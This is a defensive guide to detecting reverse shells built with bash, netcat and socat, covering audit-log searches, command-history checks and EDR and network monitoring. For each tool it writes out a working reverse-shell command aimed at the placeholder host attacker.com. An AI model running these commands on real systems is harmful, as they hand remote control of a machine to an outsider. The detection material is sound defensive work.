
# Reverse Shell


## **Reverse Shell Detection and Analysis**

**Reverse shells** are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.

***

## **Common Commands and Their Usage**

### **1. bash Command**

The **bash** command can establish a reverse shell on its own, because Bash treats redirections to `/dev/tcp/HOST/PORT` or `/dev/udp/HOST/PORT` as network connections. No separate networking binary is needed, so detection has to rely on the command line and the resulting socket rather than on the presence of a tool.

**Example**:

```bash
export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
```

**Detection**:

* **Audit Logs**:

  ```bash
  grep "bash" /var/log/audit/audit.log | grep -E "udp|tcp"
  # auditd hex-encodes an argument that contains spaces or quotes (as the
  # bash -c payload does), so also search the decoded records:
  ausearch -i -c bash | grep -E "/dev/(tcp|udp)"
  ```
* **Command History**:

  ```bash
  history | grep "bash" | grep -E "udp|tcp"
  grep "bash" ~/.bash_history | grep -E "udp|tcp"
  ```
* **EDR/XDR Logs**:\
  Monitor for **bash process creation** or **network events** involving `/dev/tcp` or `/dev/udp`.

### **2. nc (Netcat) Command**

**Netcat** is a versatile utility often used for reverse shells.

**Example**:

```bash
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
```

**Detection**:

* Focus on the **`-e`** (execute a program) and **`-l`** (listen) parameters. `-e` exists in traditional netcat builds and in Ncat (which also accepts `-c`), while the OpenBSD variant lacks it, so the absence of `-e` does not by itself rule out a netcat-based shell.
* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "nc" | grep "\-e"
  ```
* **Command History**:

  ```bash
  history | grep "nc" | grep "\-e"
  cat ~/.bash_history | grep "nc" | grep "\-e"
  ```
* **EDR/XDR Logs**:\
  Monitor **nc process creation** and check for unusual outbound connections.

### **3. socat Command**

**socat** offers more flexibility than **nc**, making it a preferred choice for advanced reverse shells. In the example below, the `pty,stderr,setsid,sigint,sane` options give the connection a fully interactive pseudo-terminal; an `exec:` address combined with a TCP address and a pty is itself a strong detection signal.

**Example**:

```bash
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
```

**Detection**:

* Investigate commands using **`exec`** and **`tcp-connect`**.
* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "socat" | grep -i "exec"
  ```
* **Command History**:

  ```bash
  history | grep "socat" | grep -i "exec"
  cat ~/.bash_history | grep "socat" | grep -i "exec"
  ```
* **EDR/XDR Logs**:\
  Analyze **socat processes** for suspicious parameters and unexpected network activity.

***

## **General Detection Strategies**

### **1. Audit Logs**

Continuously monitor `/var/log/audit/audit.log` for specific commands and associated parameters. EXECVE records are written only when an `execve` audit rule is loaded, and arguments containing spaces or quotes are stored hex-encoded, so `ausearch -i` is the more reliable way to read them:

* **Commands to Track**: `bash`, `nc`, `socat`
* **Example**:

  ```bash
  cat /var/log/audit/audit.log | grep [command]
  ```

### **2. Command History**

Regularly inspect command history files for traces of suspicious commands. Bash writes `~/.bash_history` only when an interactive shell exits, and the file can be disabled or truncated by the user, so an empty history does not prove the absence of activity:

* **Interactive Sessions**:

  ```bash
  history | grep [command]
  ```
* **Persistent Logs**:

  ```bash
  cat ~/.bash_history | grep [command]
  ```

### **3. EDR/XDR Solutions**

Employ EDR or XDR tools to:

* **Track Process Creation**: Identify the origin of reverse shell tools.
* **Analyze Network Activity**: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.

### **4. Network Monitoring**

Set up alerts for:

* **Unusual Outbound Connections**: Look for high-frequency requests to external IPs.
* **Known Malicious Indicators**: Monitor outbound traffic to flagged domains or IPs.

***

## **Key Takeaways**

* **Reverse shells** exploit legitimate utilities like **bash**, **nc**, and **socat** for remote control.
* **Detection** relies on monitoring suspicious **process creation**, **command execution**, and **network connections**.
* **Forensic Analysis** requires correlating data from:
  * **Audit logs** (`/var/log/audit/audit.log`).
  * **Command histories** (`history` or `.bash_history`).
  * **EDR/XDR telemetry** for process and network activity.

By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.
